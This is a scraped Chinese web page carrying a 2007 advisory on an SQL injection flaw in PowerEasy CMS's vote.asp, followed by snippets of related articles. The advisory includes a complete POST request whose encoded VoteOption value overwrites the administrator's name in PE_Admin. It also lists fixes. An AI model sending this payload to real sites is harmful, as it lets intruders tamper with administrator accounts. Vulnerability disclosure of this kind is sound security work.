2007 10.30动易网站管理系统vote.asp页面存在SQL注入漏洞_漏洞研究

测试系统:
        动易(PowerEasy CMS SP6 071030以下版本)

安全综述:
       动易网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容管理解决方案产品。

漏洞描述:
    vote.asp调用了动易组件PE_Site.ShowVote,此组件VoteOption参数过滤不严,导致可以进行mssql注入
    但是其语句里面过滤了-- ;等字符,又是一个UPDATE形的注入,有一定的限制。但是其过滤的顺序不对。有导致mssql的注释符号--可以进入语句

测试方法:

   POST  Vote.asp HTTP/1.1
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
    Referer:  http://127.0.0.1/Vote.asp?ID=2&Action=Show
    Accept-Language: zh-cn
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
    Host: 127.0.0.1
    Content-Length: 160
    Connection: Keep-Alive
    Cache-Control: no-cache
    Cookie: rtime=0; ltime=1191765883073; cnzz_eid=6855133-; AJSTAT_ok_times=2; ViewMode=1; PJBlog2Setting=ViewType=normal; http%3A%2F%2Fkw%2Elyedu%2Ecom%2Ecn=lao=8; style=null; chkRemember=false; ASPSESSIONIDSSRCABTA=JJODPHAACKPHCFNFCKEINALN; VotedID=1

    VoteOption=1%3D1+%75%70%64%61%74%65%20%50%45%5F%41%64%6D%69%6E%20%73%65%74%20%61%64%6D%69%6E%6E%61%6D%65%3D%30%78%36%31%2D%3B%2D&VoteType=Multi&Action=Vote&ID=2

    其中 1%3D1+%75%70%64%61%74%65%20%50%45%5F%41%64%6D%69%6E%20%73%65%74%20%61%64%6D%69%6E%6E%61%6D%65%3D%30%78%36%31%2D%3B%2D解码后为
    1=1+update PE_Admin set adminname=0x61-;-
    他们先过滤了--再过滤; 导致以-;-的形式可以很轻松的把注释符带入语句,执行语句后,成功把管理员的用户名设置为a
解决方案:
        更新动易组件(需要管理员的权限才能更新)。
    不需要投票功能的用户,删除此文件。
    有需要,但是又没有权限更新动易组件(需要管理员的权限才能更新)的用户。请在vote.asp文件自行过滤各个参数。

时间: 2024-09-20 09:22:52

2007 10.30动易网站管理系统vote.asp页面存在SQL注入漏洞_漏洞研究的相关文章

动易网站的seo优化与gg广告的优化

seo|广告|优化 本人比较喜欢用动易的系统建网站,因为它的确很简单,而且在本地的调试和安装也非常的方便.玩多了,就来写写自己的一些技巧,希望可以帮更多的落伍的兄弟的忙!同时希望可以快快的落伍呀,没有落伍感觉交流很困难!当然我的研究不是很深也不是很系统.我个人是学市场营销专业的,目前大三在读中.学了两年多的网站建设,到现在才算是真的入门了,现在正在做个新的站,也是用动易的系统.希望可以赚点钱,哎,大三了,还在向家里要生活费,惭愧呀 一.动易文章管理系统的seo优化1.本文针对的是比较熟悉动易系统

南方数据企业网站管理系统 V9.0全屏版完整版_常用工具

软件名称:南方数据9.0全屏企业网站管理系统软件版本:V9.0软件类型: ASP全站代码程序演示前台http://china.0791idc.com 程序试用前台http://china.0791idc.com/demo程序试用后台http://china.0791idc.com/demo/admin后台登陆帐号:admin  密码:0791idc下载地址http://china.0791idc.com/download/0791idc8.0.rar软件大小:2.59M 南方数据企业网站管理系统

ASP.NET网站管理系统退出 清除浏览器缓存,Session的代码_实用技巧

1.在系统登陆成功时记录登陆的用户名.密码等信息(登陆功能的部分代码) 复制代码 代码如下: Session["id"] = user.id.ToString(); Session["name"] = user.name.ToString(); Session["pwd"] = user.password.ToString(); Session["time"] = user.LoginTime.ToString(); Sess

新思路现动网新漏洞_漏洞研究

作者:优格GXU 文章来源:邪恶八进制信息安全团队   文章作者:优格[GXU] (www.wuzhou.org)   信息来源:邪恶八进制信息安全团队(www.eviloctal.com)   原文下载:http://www.wuzhou.org/dvbbs.doc   前段时间focn等人发现了动网的提权漏洞,这漏洞可是闹得天翻地覆的,连当当网论坛也给挂上马了.正是这个漏洞盖住了动网的其他漏洞,使动网的其他漏洞少为人知.   相信大家都看过<终结动网最新挂马方法!>的文章了,其实这个漏洞已

最新版本的动易+动网+oBlog三站整合方法_应用技巧

我用的是最新版本的动易PE_2006_SP5 +动网dvbbs7.1.0 + oBlog 4.0.  我的测试情况:1.可以同步注册.2.可以同步删除用户ID.3.不像帖子里说的可以同步登陆.(可能是我的COOKIES问题,有在用的测试一下哈)4.可以同步修改密码. 1.准备工作,下载并安装三个系统,并使各自均能独立运行.  (1).打开动易压缩包 PowerEasy_CMS2006_SP4_Express.rar或PowerEasy_eShop2006_SP4_Express.rar,运行Po

动网7.x权限提升漏洞原理_漏洞研究

在6月份的黑防上看到<动网7.1漏洞惊现江湖>一文说是admin_postings.asp文件存在注入漏洞但利用的前提是拥有超级版主或前台管理员权限.我想起以前发现的动网7.x版本存在一个前台权限提升漏洞 正好可以结合起来利用.这个前台权限提升漏洞对7.x的ccess和 SQL版都有效.下面我们就以7.0 SP2 SQL版讲解这个漏洞的利用. 漏洞分析 我们知道动网是通过GroupID来判断当前用户所在的组的然后再通过组的信息判断用户的权限.它是如何取得这个GroupID的呢让我们看看登录验证

动易CMS 2007 Beta1 正式亮相!

中介交易 SEO诊断 淘宝客 云主机 技术大厅 亲爱的朋友们,大家好! 国内首款基于.NET 2.0全新研发的CMS系统--动易CMS 2007,今日正式启动公开测试活动! 早在2005年8月,动易公司就确立了动易CMS 2007的开发计划.在经过大量调研和研发储备后,直至2006年7月动易CMS 2007才全面进入正式研发阶段.经过了一年多的系统设计.产品开发和内部测试,动易CMS 2007现在进入了全面公开测试及BUG修复阶段.为了确保全面有效的测试和做好进一步的完善工作,我们特向全球发布动

ASP编程的网络交友征婚婚介网站管理系统源码正式版下载

ASP编程的网络交友征婚婚介网站管理系统源码正式版下载,网络交友征婚婚介网站管理系统源码正式版,后台管理从前台网站输入http://***.***.***/admin/login.asp 进入后台管理管理员:admin   登陆密码:admin     信息时代,网民,网友几十亿,需要一个最大的交友网站,婚恋交友网站实现个人信息的发布,交友信息的发布,以交友为中心,广交天下友,寻找人生道路上的知己.征婚频道:服务于交友网上的有征婚需求的特定人群.网站分交友俱乐站,交友专区,征婚专区,动漫地带,爱

动易

问题描述 本人刚接触.net,无意间听朋友说起了动易,现在很想知道动易是什么东东?怎样使用? 解决方案 解决方案二:动易网络,产品有论坛,后台管理系统等解决方案三:动易是一个网站系统,支持动易组件,说明服务器支持动易网页管理系统.解决方案四:http://www.baidu.com/s?wd=%CA%B2%C3%B4%CA%C7%B6%AF%D2%D7这里有详细的解决方案五:引用2楼gyouyang的回复: 动易是一个网站系统,支持动易组件,说明服务器支持动易网页管理系统. 能说的在详细点吗?有